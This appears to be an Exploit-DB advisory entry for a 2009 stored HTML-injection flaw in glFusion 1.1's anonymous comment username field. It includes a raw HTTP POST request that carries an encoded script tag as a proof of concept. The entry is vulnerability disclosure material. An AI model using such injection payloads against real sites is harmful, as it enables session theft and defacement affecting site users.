glFusion 1.1 - Anonymous Comment 'Username' HTML Injection

EDB-ID:

32784




Platform:

PHP

Date:

2009-02-05


source: https://www.securityfocus.com/bid/33683/info

glFusion is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

glFusion 1.1.0 and 1.1.1 are vulnerable; other versions may also be affected. 

POST /comment.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-
application, */*
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding:
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: www.glfusion.org
Pragma: no-cache
Connection: Keep-Alive
sid=fileid_20&pid=0&type=filemgmt&_glsectoken=&comment=&uid=1&username=Anonymous+Use
r%22%3e%3csCrIpT%3ealert(1234)%3c%2fsCrIpT%3e&title=Hello&comment=Hello&comment_h
tml=Hello&postmode=html&captcha=47TXJC&csid=49816d4bcd4b&mode=Submit+Comment